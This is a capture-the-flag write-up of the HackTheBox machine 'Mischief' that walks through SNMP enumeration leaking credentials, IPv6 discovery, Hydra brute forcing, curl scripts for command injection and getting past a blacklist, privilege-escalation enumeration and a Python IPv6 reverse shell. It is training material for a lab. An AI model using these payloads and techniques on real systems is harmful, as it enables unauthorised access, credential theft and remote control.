Mischief-HackTheBox-WriteUp

Mischief-HackTheBox-WriteUp

Hello people,

First writeup for an Insane box! Learned tons from this machine!

So many strong basic enumeration techniques that are crucial to creating a strong methodology can be used.

Such an extent that the box feels easy at parts just by enumerating tightly.

There is a cool combo with two wee scripts by 0xdf, they can be used to enumerate and execute bash commands on a REC vector, they are very fun and great for creating a foundation for your future scripts and improving recon in general.

I also used a few tricks from GatoGamer1155, this guy makes some of the best content in the Hispano-American scene.

And tons of documentation about SNMP, understanding deeply the way this protocol is used and the way its components communicate is crucial.

The importance of MIBs is such that you have to have their packages downloaded on every setup by default.

SNMP Agent's architecture patterns, with tons of documentation to enumerate all their daemons.

The nature that this protocol has to behave as a proxy between ipv4 and ipv6 interfaces.

The SNMP version is v2c on this box while the latest version is v3. The latter has an improved way of authentication thanks to a slightly improved encryption, but we are not worried about that here.

Very good machine to recommend if someone would ask for the best first insane machine to start for me so far.

After starting like always by creating a directory to work on the machine and running the first nmap scan.

Just port 22 and port 3366 running HTTP

We can take a look at port 3366. But there barely are records, something on adminsub

The screen just prints some Trojan reports from the past. The HTTP is running a login page on a HTTPcurlSimpleHTTPServer

Curl to check its response

curl -s -k -v -i 10.10.10.92:3366

It's asking for authentication, the response is in plain text. Mr Python radical calendar and contacts server. Seems like it's a sort kind of office device. Based on a contact list for login sessions, calendar for scheduled tasks and days of the week.

Must be managed somehow. Maybe it is from a different interface or a missing protocol, let's check for UDP activity

sudo nmap -sU --top-ports 100 -T5 -v -n -Pn 10.10.10.92

Port 161 is open runnig UDP

#Look closely
sudo nmap -sU -p 161 -sC 10.10.10.92

Loki is hosting the show, UDP is leaking, and the HTTP server is leaking too. A process with id 757 shows the password in plaintext in front of us.

Can we get a webshell?

An Apache process is running also without any known ports, maybe locally for an internal network?

We can even see systemd PID

Let's login with the credentials we got

More credentials, same user name, different passwords. I can't ssh in.

Passwords are for login, logins are sessions, and sessions run on services.

I can see even the systemd from the machine, I know is also hosting an Apache server.

Maybe internally or they may be using a different interface.

SNMP is an interesting protocol, if we want to enumerate it properly, we need to understand how it works.

Look at it's components

Ask Chatgpt

  • SNMP Agents, Software Agents or processes running on network devices, expose information about the device's status, configuration, and performance. Data is organised according to the structure defined in MIBs

  • SNMP managers, systems or applications used for network management, send SNMP requests to SNMP Agents to retrieve information or perform actions on network devices.

  • MIBs are used as a reference by both SNMP managers and agents to ensure that they understand the structure and meaning of the data being exchanged. Making the information human-readable.

  • MIBs provide a standardized way to represent and describe the information that can be managed using SNMP.

They communicate using SNMP messages

By looking at the wiki it doesn't seem like we are dealing with SNMP v3

MIB packets help to make more efficient SNMP enumeration. You can request specific information from devices rather than retrieving entire tables of data, which reduces unnecessary network traffic. Instead of guessing OIDs or conducting exhaustive scans, you can refer to MIBs to understand the structure and hierarchy of managed objects, making enumeration more precise and targeted.

MIBs make SNMP data human-readable and provides commands to manage agents.

Download the packages and comment MIBs from the SNMP config file

sudo apt install snmp-mibs-downloader

Worth reading Hacktrick's article about SNMP pen-testing and extra documentation about MIBs

#Big chunk
snmpwalk -v 2c -c public 10.10.10.92
#Process
snmpbulkwalk -v2c -c public 10.10.10.92 hrSWRunName
#Within the process
snmpbulkwalk -v2c -c public 10.10.10.92 hrSWRunTable | grep <PID>
#Interfaces
snmpbulkwalk -v2c -c public 10.10.10.92 ipAddressType

There is an ipv6 interface right there

We can find more documentation about SNMP AGENTS acting like proxies between ipv4 and ipv6

There are plenty of references to this proxy feature

They are also mentioned on the wiki for Software Agents

From the snmpbulkwalk scan

Seems like there is ipv6 address if we delete the extra :

"de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:34:6c"
#Delete the extra :
"dead:beef::250:56ff:feb9:346c"

Running nmap for ipv6 we got port 22 and 80 open

Add it to /etc/hosts or use [ipv6] it's up to you and check the HTTP server

Cant use the credentials that we got ---> loki:trickeryanddeceit

But I can bruteforce with Hydra

hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P passwords.txt mischief.htb http-post-form "/login.php:user=^USER^&password=^PASS^:Sorry"

There is a match for administrator

We can have command execution but some processes are blacklisted, and the word "credentials" is also blacklisted.

0xdf did a cool script to enumerate the processes that are not blacklisted using curl

#/bin/bash

command_file=$1
for cmd in $(cat ${command_file}); do
    curl -s -6 -X POST "http://[IPV6]:80/" -H "Cookie: PHPSESSID=IDNUM" -d "command=${cmd}" | grep -q "Command is not allowed."
    if [ $? -eq 1 ]; then
        echo -e "  \e[42m${cmd}\e[49m allowed";
    else
        echo -e "  \e[41m${cmd}\e[49m blocked";
    fi;
done

#By 0xdf
#Create a list with the commands you want to test and give as argument

By creating a list we can enumerate what is allowed by the application

Now we can use his second script to execute commands, these two scrips are very good for further modifications depending on the situation and make a really good combo

#!/bin/bash

ip=$1
cmd=$2

curl -s -6 -X POST "http://[${ip}]:80/" -d "command=${cmd};" | grep -F "</html>" -A 10 | grep -vF -e "</html>" -e "Command was executed succesfully!"

0xdf uses a wildcard character ? to bypass the filename being blacklisted and still read the file by using the actual filename inside “” when doing curl

GatoGamer1155 use a similar technique but with * directly on the web shell

Simple cool tricks that we can do after having done a strong enumeration

Dope, this way we can ssh in as Loki and get the user flag

Every time you want to escalate your privileges, build a good habit of running commands to enumerate files and permissions

#SUID
find / -perm -4000 -type f 2>/dev/null 

#Passwords
grep -iR "pass" *
grep -r "password" .

In this case, looking at the SUIDs we can find multiple vectors that could be exploited.

pkxec can be used to pwnkit. And probably more if you dig binaries at GTFO

The Python server keeps leaking passwords this time on the bash history

You could use history command itself and you would see the password close to free -mt

Good practice to always check the bash history

Another simple way to keep enumerating binaries is by using getfacl

We can use the previous script from 0xdf to enumerate su and sudo on the web shell

Green light means we should be rooting with the password leaked

We just need to get the web shell first, shouldn't be too hard to get a reverse shell.

Make sure you have a proper setup to set listeners on IPv6

You can try by having netcat-openbsd configured properly or just by using socat which provided an easier way to listen IPv6 from the get-go

socat TCP6-LISTEN:1234,bind=::,fork -

Craft the payload easily by grabbing an IPv6 Python reverse shell. You can have a look at a revshell and change AF_INET for AF_INET6 and adding ; at the end

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("IPV6",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

#Add your IPV6 and port and remenber adding ; at the end
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1010",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Execute

The flag is not around but we can enumerate files like Champs

find / -name root.txt 2>/dev/null